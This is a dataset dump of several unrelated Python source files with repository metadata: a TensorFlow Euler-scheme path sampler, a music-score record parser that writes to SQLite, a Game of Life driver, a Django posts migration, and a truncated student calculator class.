`dtype` as `times`. Represents random normal draws to compute increments
`N(0, t_{n+1}) - N(0, t_n)`. When supplied, `num_samples` argument is
ignored and the first dimensions of `normal_draws` is used instead.
Default value: `None` which means that the draws are generated by the
algorithm. By default normal_draws for each model in the batch are
independent.
watch_params: An optional list of zero-dimensional `Tensor`s of the same
`dtype` as `initial_state`. If provided, specifies `Tensor`s with respect
to which the differentiation of the sampling function will happen.
A more efficient algorithm is used when `watch_params` are specified.
Note the the function becomes differentiable onlhy wrt to these `Tensor`s
and the `initial_state`. The gradient wrt any other `Tensor` is set to be
zero.
validate_args: Python `bool`. When `True` performs multiple checks:
* That `times` are increasing with the minimum increments of the
specified tolerance.
* If `normal_draws` are supplied, checks that `normal_draws.shape[1]` is
equal to `num_time_steps` that is either supplied as an argument or
computed from `time_step`.
      When `False`, invalid dimensions may silently render incorrect outputs.
Default value: `False`.
tolerance: A non-negative scalar `Tensor` specifying the minimum tolerance
for discernible times on the time grid. Times that are closer than the
tolerance are perceived to be the same.
Default value: `None` which maps to `1-e6` if the for single precision
`dtype` and `1e-10` for double precision `dtype`.
dtype: `tf.Dtype`. If supplied the dtype for the input and output `Tensor`s.
Default value: None which means that the dtype implied by `times` is
used.
name: Python string. The name to give this op.
Default value: `None` which maps to `euler_sample`.
Returns:
A real `Tensor` of shape batch_shape_process + [num_samples, k, n] where `k`
is the size of the `times`, `n` is the dimension of the process.
Raises:
ValueError:
(a) When `times_grid` is not supplied, and neither `num_time_steps` nor
`time_step` are supplied or if both are supplied.
(b) If `normal_draws` is supplied and `dim` is mismatched.
tf.errors.InvalidArgumentError: If `normal_draws` is supplied and
`num_time_steps` is mismatched.
"""
name = name or 'euler_sample'
with tf.name_scope(name):
times = tf.convert_to_tensor(times, dtype=dtype)
if dtype is None:
dtype = times.dtype
asserts = []
if tolerance is None:
tolerance = 1e-10 if dtype == tf.float64 else 1e-6
tolerance = tf.convert_to_tensor(tolerance, dtype=dtype)
if validate_args:
asserts.append(
tf.assert_greater(
times[1:], times[:-1] + tolerance,
message='`times` increments should be greater '
'than tolerance {0}'.format(tolerance)))
if initial_state is None:
initial_state = tf.zeros(dim, dtype=dtype)
initial_state = tf.convert_to_tensor(initial_state, dtype=dtype,
name='initial_state')
batch_shape = tff_utils.get_shape(initial_state)[:-2]
num_requested_times = tff_utils.get_shape(times)[0]
# Create a time grid for the Euler scheme.
if num_time_steps is not None and time_step is not None:
raise ValueError(
'When `times_grid` is not supplied only one of either '
'`num_time_steps` or `time_step` should be defined but not both.')
if times_grid is None:
if time_step is None:
if num_time_steps is None:
raise ValueError(
'When `times_grid` is not supplied, either `num_time_steps` '
'or `time_step` should be defined.')
num_time_steps = tf.convert_to_tensor(
num_time_steps, dtype=tf.int32, name='num_time_steps')
time_step = times[-1] / tf.cast(num_time_steps, dtype=dtype)
else:
time_step = tf.convert_to_tensor(time_step, dtype=dtype,
name='time_step')
else:
times_grid = tf.convert_to_tensor(times_grid, dtype=dtype,
name='times_grid')
if validate_args:
asserts.append(
tf.assert_greater(
times_grid[1:], times_grid[:-1] + tolerance,
message='`times_grid` increments should be greater '
'than tolerance {0}'.format(tolerance)))
times, keep_mask, time_indices = utils.prepare_grid(
times=times,
time_step=time_step,
num_time_steps=num_time_steps,
times_grid=times_grid,
tolerance=tolerance,
dtype=dtype)
if normal_draws is not None:
normal_draws = tf.convert_to_tensor(normal_draws, dtype=dtype,
name='normal_draws')
# Shape [num_time_points] + batch_shape + [num_samples, dim]
normal_draws_rank = normal_draws.shape.rank
perm = tf.concat(
[[normal_draws_rank-2], tf.range(normal_draws_rank-2),
[normal_draws_rank-1]], axis=0)
normal_draws = tf.transpose(normal_draws, perm=perm)
num_samples = tf.shape(normal_draws)[-2]
draws_dim = normal_draws.shape[-1]
if dim != draws_dim:
raise ValueError(
'`dim` should be equal to `normal_draws.shape[2]` but are '
'{0} and {1} respectively'.format(dim, draws_dim))
if validate_args:
draws_times = tff_utils.get_shape(normal_draws)[0]
asserts.append(tf.assert_equal(
draws_times, tf.shape(keep_mask)[0] - 1,
message='`num_time_steps` should be equal to '
'`tf.shape(normal_draws)[1]`'))
if validate_args:
with tf.control_dependencies(asserts):
times = tf.identity(times)
if watch_params is not None:
watch_params = [tf.convert_to_tensor(param, dtype=dtype)
for param in watch_params]
return _sample(
dim=dim,
batch_shape=batch_shape,
drift_fn=drift_fn,
volatility_fn=volatility_fn,
times=times,
keep_mask=keep_mask,
num_requested_times=num_requested_times,
num_samples=num_samples,
initial_state=initial_state,
random_type=random_type,
seed=seed,
swap_memory=swap_memory,
skip=skip,
precompute_normal_draws=precompute_normal_draws,
normal_draws=normal_draws,
watch_params=watch_params,
time_indices=time_indices,
dtype=dtype)
def _sample(*,
dim,
batch_shape,
drift_fn,
volatility_fn,
times,
keep_mask,
num_requested_times,
num_samples,
initial_state,
random_type,
seed, swap_memory,
skip,
precompute_normal_draws,
watch_params,
time_indices,
normal_draws,
dtype):
"""Returns a sample of paths from the process using Euler method."""
dt = times[1:] - times[:-1]
sqrt_dt = tf.sqrt(dt)
# current_state.shape = batch_shape + [num_samples, dim]
current_state = initial_state + tf.zeros([num_samples, dim], dtype=dtype)
steps_num = tff_utils.get_shape(dt)[-1]
wiener_mean = None
if normal_draws is None:
# In order to use low-discrepancy random_type we need to generate the
# sequence of independent random normals upfront. We also precompute random
# numbers for stateless random type in order to ensure independent samples
    # for multiple function calls with different seeds.
if precompute_normal_draws or random_type in (
random.RandomType.SOBOL,
random.RandomType.HALTON,
random.RandomType.HALTON_RANDOMIZED,
random.RandomType.STATELESS,
random.RandomType.STATELESS_ANTITHETIC):
normal_draws = utils.generate_mc_normal_draws(
num_normal_draws=dim, num_time_steps=steps_num,
num_sample_paths=num_samples, batch_shape=batch_shape,
random_type=random_type, dtype=dtype, seed=seed, skip=skip)
wiener_mean = None
else:
      # If pseudo or antithetic sampling is used, proceed with random sampling
# at each step.
wiener_mean = tf.zeros((dim,), dtype=dtype, name='wiener_mean')
normal_draws = None
if watch_params is None:
# Use while_loop if `watch_params` is not passed
return _while_loop(
steps_num=steps_num,
current_state=current_state,
drift_fn=drift_fn, volatility_fn=volatility_fn, wiener_mean=wiener_mean,
num_samples=num_samples, times=times,
dt=dt, sqrt_dt=sqrt_dt, keep_mask=keep_mask,
num_requested_times=num_requested_times,
swap_memory=swap_memory,
random_type=random_type, seed=seed, normal_draws=normal_draws,
dtype=dtype)
else:
# Use custom for_loop if `watch_params` is specified
return _for_loop(
batch_shape=batch_shape, steps_num=steps_num,
current_state=current_state,
drift_fn=drift_fn, volatility_fn=volatility_fn, wiener_mean=wiener_mean,
num_samples=num_samples, times=times,
dt=dt, sqrt_dt=sqrt_dt, time_indices=time_indices,
keep_mask=keep_mask, watch_params=watch_params,
random_type=random_type, seed=seed, normal_draws=normal_draws)
def _while_loop(*, steps_num, current_state,
drift_fn, volatility_fn, wiener_mean,
num_samples, times, dt, sqrt_dt, num_requested_times,
keep_mask, swap_memory, random_type, seed, normal_draws, dtype):
"""Sample paths using tf.while_loop."""
written_count = 0
if isinstance(num_requested_times, int) and num_requested_times == 1:
record_samples = False
result = current_state
else:
# If more than one sample has to be recorded, create a TensorArray
record_samples = True
element_shape = current_state.shape
result = tf.TensorArray(dtype=dtype,
size=num_requested_times,
element_shape=element_shape,
clear_after_read=False)
# Include initial state, if necessary
result = result.write(written_count, current_state)
written_count += tf.cast(keep_mask[0], dtype=tf.int32)
# Define sampling while_loop body function
def cond_fn(i, written_count, *args):
# It can happen that `times_grid[-1] > times[-1]` in which case we have
# to terminate when `written_count` reaches `num_requested_times`
del args
return tf.math.logical_and(i < steps_num,
written_count < num_requested_times)
def step_fn(i, written_count, current_state, result):
return _euler_step(
i=i,
written_count=written_count,
current_state=current_state,
result=result,
drift_fn=drift_fn,
volatility_fn=volatility_fn,
wiener_mean=wiener_mean,
num_samples=num_samples,
times=times,
dt=dt,
sqrt_dt=sqrt_dt,
keep_mask=keep_mask,
random_type=random_type,
seed=seed,
normal_draws=normal_draws,
record_samples=record_samples)
# Sample paths
_, _, _, result = tf.while_loop(
cond_fn, step_fn, (0, written_count, current_state, result),
maximum_iterations=steps_num,
swap_memory=swap_memory)
if not record_samples:
# shape batch_shape + [num_samples, 1, dim]
return tf.expand_dims(result, axis=-2)
# Shape [num_time_points] + batch_shape + [num_samples, dim]
result = result.stack()
# transpose to shape batch_shape + [num_samples, num_time_points, dim]
n = result.shape.rank
perm = list(range(1, n-1)) + [0, n - 1]
return tf.transpose(result, perm)
def _for_loop(*, batch_shape, steps_num, current_state,
drift_fn, volatility_fn, wiener_mean, watch_params,
num_samples, times, dt, sqrt_dt, time_indices,
keep_mask, random_type, seed, normal_draws):
"""Sample paths using custom for_loop."""
del batch_shape
num_time_points = time_indices.shape.as_list()[:-1]
if isinstance(num_time_points, int) and num_time_points == 1:
iter_nums = steps_num
else:
iter_nums = time_indices
def step_fn(i, current_state):
# Unpack current_state
current_state = current_state[0]
_, _, next_state, _ = _euler_step(
i=i,
written_count=0,
current_state=current_state,
result=current_state,
drift_fn=drift_fn,
volatility_fn=volatility_fn,
wiener_mean=wiener_mean,
num_samples=num_samples,
times=times,
dt=dt,
sqrt_dt=sqrt_dt,
keep_mask=keep_mask,
random_type=random_type,
seed=seed,
normal_draws=normal_draws,
record_samples=False)
return [next_state]
result = custom_loops.for_loop(
body_fn=step_fn,
initial_state=[current_state],
params=watch_params,
num_iterations=iter_nums)[0]
if num_time_points == 1:
return tf.expand_dims(result, axis=-2)
# result.shape=[num_time_points] + batch_shape + [num_samples, dim]
# transpose to shape=batch_shape + [num_time_points, num_samples, dim]
n = result.shape.rank
perm = list(range(1, n-1)) + [0, n - 1]
return tf.transpose(result, perm)
def _euler_step(*, i, written_count, current_state,
drift_fn, volatility_fn, wiener_mean,
num_samples, times, dt, sqrt_dt, keep_mask,
random_type, seed, normal_draws, result,
record_samples):
"""Performs one step of Euler scheme."""
current_time = times[i + 1]
written_count = tf.cast(written_count, tf.int32)
if normal_draws is not None:
dw = normal_draws[i]
else:
dw = random.mv_normal_sample(
(num_samples,), mean=wiener_mean, random_type=random_type,
seed=seed)
dw = dw * sqrt_dt[i]
dt_inc = dt[i] * drift_fn(current_time, current_state) # pylint: disable=not-callable
dw_inc = tf.linalg.matvec(volatility_fn(current_time, current_state), dw) # pylint: disable=not-callable
next_state = current_state + dt_inc + dw_inc
if record_samples:
result = result.write(written_count, next_state)
else:
result = next_state
written_count += tf.cast(keep_mask[i + 1], dtype=tf.int32)
return i + 1, written_count, next_state, result
__all__ = ['sample']
| [
"tf-quant-finance-robot@google.com"
] | tf-quant-finance-robot@google.com |
a821a6aa4773d3bfcef21fe0686736f02a750663 | c9d444386d8c8b33915a25155b17e8532fd64c59 | /03-persistent_data/scorelib.py | ce97689519a6243c38719bb99c14edc53da6a623 | [] | no_license | xkustan/PV248 | 45ca890786399ab2671b34bf0776bd24ab91f917 | e3e97a1fea3d0a4e65368facf28f4a758e9609a8 | refs/heads/master | 2020-03-29T19:53:55.781537 | 2019-01-14T22:09:06 | 2019-01-14T22:09:06 | 150,284,380 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 14,682 | py | import re
from sqlite3 import IntegrityError
class Person(object):
def __init__(self, name, born, died, type):
self.name = name
self.born = born
self.died = died
self.type = type
def __repr__(self):
return "{0} ({1}--{2})".format(self.name, self.born, self.died)
def insert_or_update_to_db(self, db_conn):
cur = db_conn.cursor()
insert_sql = "INSERT INTO person(name, born, died) VALUES (?, ?, ?);"
try:
cur.execute(insert_sql, (self.name, self.born, self.died))
db_conn.commit()
return cur.lastrowid
except IntegrityError:
cur.execute("SELECT * FROM person WHERE name = ?", (self.name,))
person_list = cur.fetchall()
if len(person_list) != 1:
raise Exception("Integrity broken!")
person = person_list[0]
new_born = person[1] if person[1] is not None else self.born # person[1] is born column in DB
new_died = person[2] if person[2] is not None else self.died # person[2] is died column in DB
person_id = person[0]
cur.execute("UPDATE person SET born = ?, died = ? WHERE id = ?", (new_born, new_died, person_id))
db_conn.commit()
return person_id
class Editor(Person):
def __init__(self, name=None, born=None, died=None):
Person.__init__(self, name, born, died, "editor")
def create_from_text(self, text_editor):
tmp_name, *rest = text_editor.split("(")
self.name = tmp_name.strip().strip("[").strip("]")
if self.name.strip() == "":
self.name = None
class Composer(Person):
def __init__(self, name=None, born=None, died=None):
Person.__init__(self, name, born, died, "composer")
def create_from_text(self, text_composer):
text_composer = text_composer.strip()
tmp_name, *rest = text_composer.split("(")
self.name = tmp_name.strip()
if self.name.strip() == "":
self.name = None
# normal range
parsed = re.search("(\d\d\d\d--\d\d\d\d)", text_composer)
if parsed:
b, d = parsed.group().split("--")
self.born, self.died = int(b), int(d)
return
# born start with *
parsed = re.search("\*\d\d\d\d", text_composer)
if parsed:
self.born = int(parsed.group()[1:6])
return
# died start with +
parsed = re.search("\+\d\d\d\d", text_composer)
if parsed:
self.died = int(parsed.group()[1:6])
return
parsed = re.search("(--\d\d\d\d)", text_composer)
if parsed:
b, d = parsed.group().split("--")
self.born, self.died = None, int(d)
return
parsed = re.search("(\d\d\d\d--)", text_composer)
if parsed:
b, d = parsed.group().split("--")
self.born, self.died = int(b), None
return
class Voice(object):
def __init__(self, name=None, range=None):
self.name = name
self.range = range
def __repr__(self):
return "{0}, {1}".format(self.range, self.name)
def create_from_text(self, text_voice):
if "--" in text_voice:
temp_range, *temp_name = text_voice.split(",", maxsplit=1)
if temp_name:
self.name = temp_name[0].strip()
else:
self.name = None
self.range = temp_range.strip()
else:
text_voice = text_voice.strip()
if text_voice.startswith("None, "):
self.range = None
self.name = text_voice.lstrip("None,").strip()
else:
self.name = text_voice
class Composition(object):
def __init__(self, name=None, incipit=None, key=None, genre=None, year=None, voices=None, authors=None):
self.name = name
self.incipit = incipit
self.key = key
self.genre = genre
self.year = year
self.voices = voices or []
self.authors = authors or []
def set_composers(self, text_value):
if ";" in text_value:
composers = [c.strip() for c in text_value.split(";")]
elif "r/F" in text_value:
composers = [c.strip() for c in text_value.split("/")]
elif "&" in text_value:
composers = [c.strip() for c in text_value.split("&")]
elif text_value.strip()[0] == "[":
composers = [c.strip() for c in text_value.strip()[1:-1].split("),")]
else:
composers = [text_value.strip()]
for comp in composers:
composer = Composer()
composer.create_from_text(comp)
if composer.name:
self.authors.append(composer)
def set_name(self, text_value):
self.name = text_value
def set_genre(self, text_value):
self.genre = text_value
def set_key(self, text_value):
self.key = text_value
def set_year(self, text_value):
try:
if int(text_value) in range(999, 10000):
self.year = text_value
else:
raise ValueError
except ValueError:
self.year = None
def set_incipit(self, text_value):
self.incipit = text_value
def add_voice(self, text_value):
voice = Voice()
voice.create_from_text(text_value)
self.voices.append(voice)
def insert_to_db(self, db_conn, composer_ids):
cur = db_conn.cursor()
get_sql = """SELECT * FROM score left join voice on score.id = voice.score
WHERE score.name = ? AND ifnull(genre, '') = ? AND ifnull(key, '') = ? AND ifnull(incipit, '') = ?
AND ifnull(year, 0) = ? AND ifnull(range, '') = ? AND ifnull(voice.name, '') = ?;"""
cur.execute(get_sql, (
self.name,
self.genre if self.genre else '',
self.key if self.key else '',
self.incipit if self.incipit else '',
self.year if self.year else 0,
self.voices[0].range if self.voices and self.voices[0].range else '',
self.voices[0].name if self.voices and self.voices[0].name else ''
))
score_voice = cur.fetchall()
if score_voice:
score_id = score_voice[0][0]
return score_id
try:
insert_sql = "INSERT INTO score(name, genre, key, incipit, year) VALUES (?, ?, ?, ?, ?);"
cur.execute(insert_sql, (self.name, self.genre, self.key, self.incipit, self.year))
db_conn.commit()
score_id = cur.lastrowid
# store relation info into score_author table
for composer in composer_ids:
cur.execute("INSERT INTO score_author(score, composer) VALUES (?, ?);", (score_id, composer))
db_conn.commit()
# store voices
voice_insert_sql = "INSERT INTO voice(number, score, range, name) VALUES (?, ?, ?, ?);"
for number, voice in enumerate(self.voices):
cur.execute(voice_insert_sql, (number + 1, score_id, voice.range, voice.name))
db_conn.commit()
return score_id
except IntegrityError:
print("INTEGRITY ERROR!")
class Edition(object):
def __init__(self, composition=None, authors=None, name=None):
self.composition = composition or self._create_default_composition()
self.authors = authors or []
self.name = name
@staticmethod
def _create_default_composition():
return Composition()
def add_name(self, text_value):
self.name = text_value.strip()
def add_authors(self, text_value):
text_value = text_value.strip()
if "continuo by" in text_value:
editors = [e.strip() for e in text_value.split(", continuo by")]
elif "continuo" in text_value:
editors = [e.strip() for e in text_value.split(", continuo")]
elif "," in text_value:
editors = []
edis = [e.strip() for e in text_value.split(",")]
if " " in edis[0]:
editors.extend(edis)
else:
for i in range(0, len(edis), 2):
editors.append(edis[i] + " " + edis[i + 1])
else:
editors = [text_value]
for edo in editors:
editor = Editor()
editor.create_from_text(edo)
if editor.name:
self.authors.append(editor)
def insert_to_db(self, db_conn, score_id, editor_ids):
cur = db_conn.cursor()
insert_sql = "INSERT INTO edition(score, name, year) VALUES (?, ?, null);"
cur.execute(insert_sql, (score_id, self.name))
db_conn.commit()
edition_id = cur.lastrowid
# store relation info into score_author table
for editor in editor_ids:
cur.execute("INSERT INTO edition_author(edition, editor) VALUES (?, ?);", (edition_id, editor))
db_conn.commit()
return edition_id
class Print(object):
def __init__(self, print_id, edition=None, partiture=None):
self.print_id = print_id
self.edition = edition or self._create_default_edition()
self.partiture = partiture
@staticmethod
def _create_default_edition():
return Edition()
def composition(self):
return self.edition.composition
def format(self):
voice_prints = []
for i, voice in enumerate(self.edition.composition.voices):
voice_prints.append(VOICE_TEMPLATE.format(i + 1, voice))
if voice_prints:
printed_voice = "\n" + "\n".join(voice_prints)
else:
printed_voice = ""
to_print = PRINT_TEMPLATE.format(
self.print_id,
self.edition.composition.authors,
self.edition.composition.name,
self.edition.composition.genre,
self.edition.composition.key,
self.edition.composition.year,
self.edition.name,
self.edition.authors,
printed_voice,
self.partiture,
self.edition.composition.incipit,
)
print(to_print)
def set_partiture_from_text(self, text_value):
if text_value.strip() in ("yes", "True"):
self.partiture = True
elif text_value.strip() in ("no", "False"):
self.partiture = False
else:
self.partiture = None
def save_to_db(self, db_conn, edition_id):
cur = db_conn.cursor()
try:
cur.execute("INSERT INTO print(id, partiture, edition) VALUES (?, ?, ?);", (
self.print_id,
"Y" if self.partiture else "N",
edition_id
))
db_conn.commit()
except IntegrityError:
print("INTEGRITY ERROR!")
def my_hash(self):
voices = "-".join([str(x) for x in self.edition.composition.voices]).replace(" ", "")
authors = "-".join([str(x) for x in self.edition.composition.authors]).replace(" ", "")
editors = "-".join([str(x) for x in self.edition.authors]).replace(" ", "")
return "_".join([
authors,
self.edition.composition.name or "",
self.edition.composition.genre or "",
self.edition.composition.key or "",
self.edition.composition.year or "",
self.edition.composition.incipit or "",
self.edition.name or "",
editors,
voices
]).replace(" ", "")
def parse_text(pattern, line):
parsed_line = re.match(pattern, line)
if parsed_line:
parsed_text = parsed_line.group(2)
parsed_text = parsed_text.strip() if parsed_text else None
if parsed_text == "":
return None
return parsed_text
def parse_line(line):
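    # Try each known "Key: value" pattern in turn and return the matched line type together with its parsed value.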
patterns = {
"print": re.compile("(Print Number: )(.*)"),
"composer": re.compile("(Composer: )(.*)"),
"title": re.compile("(Title: )(.*)"),
"genre": re.compile("(Genre: )(.*)"),
"key": re.compile("(Key: )(.*)"),
"composition_year": re.compile("(Composition Year: )(.*)"),
"edition": re.compile("(Edition: )(.*)"),
"editor": re.compile("(Editor: )(.*)"),
"voice": re.compile("(Voice \d: )(.*)"),
"partiture": re.compile("(Partiture: )(.*)"),
"incipit": re.compile("(Incipit: )(.*)"),
}
if line == "\n":
return {
"type": "newline",
"value": None,
}
for line_type, pattern in patterns.items():
parsed_line = parse_text(pattern, line)
if parsed_line:
return {
"type": line_type,
"value": parsed_line,
}
def load(file_path):
prints = []
with open(file_path, "r") as file:
p = None
for line in file:
parsed = parse_line(line)
if not parsed:
continue
parsed_type = parsed["type"]
parsed_value = parsed["value"]
if parsed_type == "print":
p = Print(int(parsed_value))
prints.append(p)
if parsed_type == "composer":
p.edition.composition.set_composers(parsed_value)
if parsed_type == "title":
p.edition.composition.set_name(parsed_value)
if parsed_type == "genre":
p.edition.composition.set_genre(parsed_value)
if parsed_type == "key":
p.edition.composition.set_key(parsed_value)
if parsed_type == "composition_year":
p.edition.composition.set_year(parsed_value)
if parsed_type == "edition":
p.edition.add_name(parsed_value)
if parsed_type == "editor":
p.edition.add_authors(parsed_value)
if parsed_type == "voice":
p.edition.composition.add_voice(parsed_value)
if parsed_type == "partiture":
p.set_partiture_from_text(parsed_value)
if parsed_type == "incipit":
p.edition.composition.set_incipit(parsed_value)
# just to be sure
if parsed_type == "newline":
p = None
file.close()
return prints
PRINT_TEMPLATE = """Print Number: {0}
Composer: {1}
Title: {2}
Genre: {3}
Key: {4}
Composition Year: {5}
Edition: {6}
Editor: {7}{8}
Partiture: {9}
Incipit: {10}
"""
VOICE_TEMPLATE = """Voice {0}: {1}"""
| [
"xenia.kustanova@gmail.com"
] | xenia.kustanova@gmail.com |
bcb0037d4f7cc33669d33e6a9923c20a32b17b0f | ad33e5ffc85afee383e9c0dad0a7d2121c209419 | /main.py | e463af873e9794c43541696aa914a2dd00bbca70 | [] | no_license | prebenas/Conways-game-of-life | 1490c720942ca028906911715a480c1e8bbbaea9 | 1d0d58580774ace8b565609c3b2713d245c6275a | refs/heads/master | 2021-04-27T10:21:59.885063 | 2018-02-22T21:31:36 | 2018-02-22T21:31:36 | 122,535,985 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 958 | py | #Importerer metoder og funksjoner fra andre klasser
from celle import *
from spillebrett import *
#Definerer hovedprogrammet hvor objektene opprettes og meny-loekken som vises
#i terminal. Lager og en while loekke slik at bruker kan se saa mange
#generasjoner han/hun vil av brettet.
def hovedprogram():
rader = int(input("Skriv inn antall rader: "))
kolonner = int(input("Skriv inn antall kolonner: "))
brett1 = Spillebrett(rader, kolonner)
print("\nGenerasjon: 0")
print("Antall levende celler: ", brett1.finnAntallLevende())
brett1.tegnBrett()
while True:
valg = input("\nTrykk enter for aa gaa videre \neller 'q' for aa avslutte:\n")
if valg == "":
print("Generasjon:", brett1.oppdatering())
print("Antall levende celler: ", brett1.finnAntallLevende())
brett1.tegnBrett()
elif valg.lower() == "q":
break
#Kaller paa hovedprogram metoden
hovedprogram() | [
"36746214+prebenas@users.noreply.github.com"
] | 36746214+prebenas@users.noreply.github.com |
c7a74916f1e6d989b248ccac707b5b4cfd0c712f | 0978dbebbafb7fc2b3b3360ec7c009bce2eaa574 | /djangular/posts/migrations/0001_initial.py | cbcac89176b82a7190a41bc8b284eda2c5e361f3 | [] | no_license | kranthikiran01/django-angular-boilerplate | 16ef7845b4ee9a51dea48292cd203788797587f1 | 223e8ba5d17b3a249019dfd334f41779fc8fb88e | refs/heads/master | 2021-01-10T07:59:59.140135 | 2016-01-01T08:40:00 | 2016-01-01T08:40:00 | 48,660,063 | 0 | 4 | null | null | null | null | UTF-8 | Python | false | false | 931 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2015-12-29 20:20
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('created_at', models.DateTimeField(auto_now_add=True)),
('updated_at', models.DateTimeField(auto_now=True)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| [
"guduru.kranthikiran@gmail.com"
] | guduru.kranthikiran@gmail.com |
c630418404934fda72a338034fb4c3f08f834a76 | 72f41e2a5c2f5a6af543e2390abefd21688830dc | /calculator.py | 32f8a794ab06078fb24ff1fae32d67270b9aec68 | [] | no_license | miratava/hyperskill-python-calculator | c3d0fdcb7435d600cc9f1e78b732a564e8470b91 | bc97b2d1f1bb6e39926bd7fc678c978763562b0a | refs/heads/master | 2022-12-04T12:46:57.205149 | 2020-08-07T17:57:56 | 2020-08-07T17:57:56 | 285,639,855 | 0 | 0 | null | 2020-08-07T17:57:57 | 2020-08-06T18:11:56 | Python | UTF-8 | Python | false | false | 12,326 | py | #hyperskill smart calculator project
import re
import enum
class Status(enum.Enum):
exit = 0
help = 1
unknown_command = 2
is_empty = 3
has_equal = 4
invalid_expression = 5
invalid_identifier = 6
unknown_variable = 7
invalid_assignment = 8
ok = 9
division_by_zero = 10
class Calculator:
help_message = (Status.help, "This program can add and subtract numbers")
help_command = "/help"
exit_command = "/exit"
unknown_command = (Status.unknown_command, "Unknown command")
unknown_variable = (Status.unknown_variable, "Unknown variable")
invalid_expression = (Status.invalid_expression, "Invalid expression")
invalid_identifier = (Status.invalid_identifier, "Invalid identifier")
invalid_assignment = (Status.invalid_assignment, "Invalid assignment")
division_by_zero = (Status.division_by_zero, "Division by zero")
exit_bye = (Status.exit, "Bye")
plus = "+"
minus = "-"
def __init__(self):
self.numbers = []
self.expression = ""
self.string = ""
self.left_part = ""
self.right_part = ""
self.variables = {}
def clear(self):
self.numbers = []
@staticmethod
def substract(num1, num2):
return num1 - num2
@staticmethod
def add(num1, num2):
return num1 + num2
@staticmethod
def multiply(num1, num2):
return num1 * num2
def divide(self, numerator, denominator):
if denominator == 0:
return self.division_by_zero
else:
return Status.ok, numerator // denominator
def is_command(self):
if self.string.startswith("/"):
return True
return False
def is_help(self):
if self.string == self.help_command:
return True
return False
def is_exit(self):
if self.is_command() and self.string == self.exit_command:
return True
return False
def is_empty(self):
if self.string == "":
return True
return False
def is_valid_command(self):
if self.is_help() or self.is_exit():
return True
return False
def is_assignment_expression(self):
if "=" in self.string:
return True
return False
def split_expression(self, expression):
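        # Tokenise the expression: digit runs become numbers, variable names are replaced by their stored values,
        # spaces are skipped, and every other character (operators, parentheses) is kept as a single token.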
expression = expression + " "
number_str = ""
variable = ""
split_expression = []
i = 0
while i < len(expression):
if expression[i].isdigit():
while expression[i].isdigit():
number_str += expression[i]
i += 1
split_expression.append(number_str)
number_str = ""
elif expression[i].isalpha():
while expression[i].isalpha():
variable += expression[i]
i += 1
number = self.variables[variable]
split_expression.append(str(number))
variable = ""
elif expression[i] == " ":
i += 1
elif expression[i] == ")" or "(":
split_expression.append(expression[i])
i += 1
else:
split_expression.append(expression[i])
i += 1
return Status.ok, split_expression
def split(self):
split_by_equal = self.string.split("=")
self.left_part = split_by_equal[0].strip()
self.right_part = split_by_equal[1].strip()
@staticmethod
def is_sign(item):
re_expression = "((-|\+)*|(\*|/){1,1})"
pattern_string = re.compile(re_expression)
if pattern_string.match(item):
return True
return False
def get_value_from_dict(self, item):
if item in self.variables:
number = self.variables[item]
return Status.ok, number
return self.unknown_variable
def validate_assignment(self):
self.split()
if self.left_part.isalpha():
if self.right_part.isalpha():
return self.get_value_from_dict(self.right_part)
if self.right_part.isdigit():
return Status.ok, self.right_part
return self.invalid_assignment
return self.invalid_identifier
def execute_assignment_expression(self):
status, value = self.validate_assignment()
if self.string.count("=") == 1:
if status == Status.ok:
self.variables[self.left_part] = value
return Status.ok, None
return status, value
return self.invalid_assignment
def execute_command(self):
if self.is_help():
return self.help_message
if self.is_exit():
return self.exit_bye
return self.unknown_command
def validate_number_parentheses(self):
parentheses = []
number_parentheses = 0
for char in self.string:
if char == "(":
parentheses.append(char)
number_parentheses += 1
elif char == ")":
try:
parentheses.pop()
except IndexError:
return self.invalid_expression
if not parentheses:
return Status.ok, number_parentheses
return self.invalid_expression
def check_expression_is_variable(self, expression):
if expression.isalpha():
if expression in self.variables:
return Status.ok, str(self.variables[expression])
return self.unknown_variable
return Status.ok, None
def validate_parentheses_expression(self, expression):
status, value = self.check_expression_is_variable(expression)
if value is None:
try:
return Status.ok, int(expression)
except ValueError:
variables = "|".join(self.variables.keys()) + "|"
if variables == "|":
variables = ""
operand_expression = "(" + variables + "\d+)"
re_expression = "(\+|-)?" + operand_expression + \
"\s*(((\+|-)+|(\*|/){1,1})\s*" + operand_expression + ")+"
pattern_string = re.compile(re_expression)
if pattern_string.match(expression):
status, value = Status.ok, expression
else:
status, value = self.invalid_expression
return status, value
def do_some_fucking_magic(self):
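        # Returns the [start, end) slice bounds of the innermost parenthesised sub-expression
        # (or of the whole string when it contains no parentheses).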
parentheses = ""
i = 0
index_start = 0
if "(" and ")" not in self.string:
index_end = len(self.string)
else:
while self.string[i] != ")":
char = self.string[i]
if parentheses == "":
if char == "(":
index_start = i + 1
else:
if char == "(":
index_start = i + 1
parentheses = ""
i += 1
index_end = i
expression_indexes = [index_start, index_end]
return Status.ok, expression_indexes
def check_parentheses_expression(self):
status, value = self.do_some_fucking_magic()
start_index = value[0]
end_index = value[1]
expression = self.string[start_index: end_index]
status, value = self.validate_parentheses_expression(expression)
if status == Status.ok:
value = [start_index, end_index]
return status, value
def replace_parentheses_by_number(self):
status, value = self.check_parentheses_expression()
start_index = value[0]
end_index = value[1]
if status is Status.ok:
status, value = self.split_expression(self.string[start_index:end_index])
if status is Status.ok:
status, value = self.execute_calculation_expression_parentheses(value)
if start_index != 0:
self.string = self.string[:start_index - 1] + str(value) + self.string[end_index + 1:]
return status, None
return status, value
def execute_calculation_expression(self):
status, value = self.validate_number_parentheses()
if status == Status.ok:
while len(self.string) > 0:
status, value = self.replace_parentheses_by_number()
if value is not None:
break
return status, value
def get_variable_value(self, item):
first = 0
second = 1
if item.isalpha():
if item in self.variables:
return self.get_value_from_dict(item)
return self.unknown_variable
if item[first] == self.plus and item[second:].isalpha():
variable = item[second:]
if variable in self.variables:
                return Status.ok, str(self.variables[variable])
return self.unknown_variable
if item[first] == self.minus and item[second:].isalpha():
variable = item[second:]
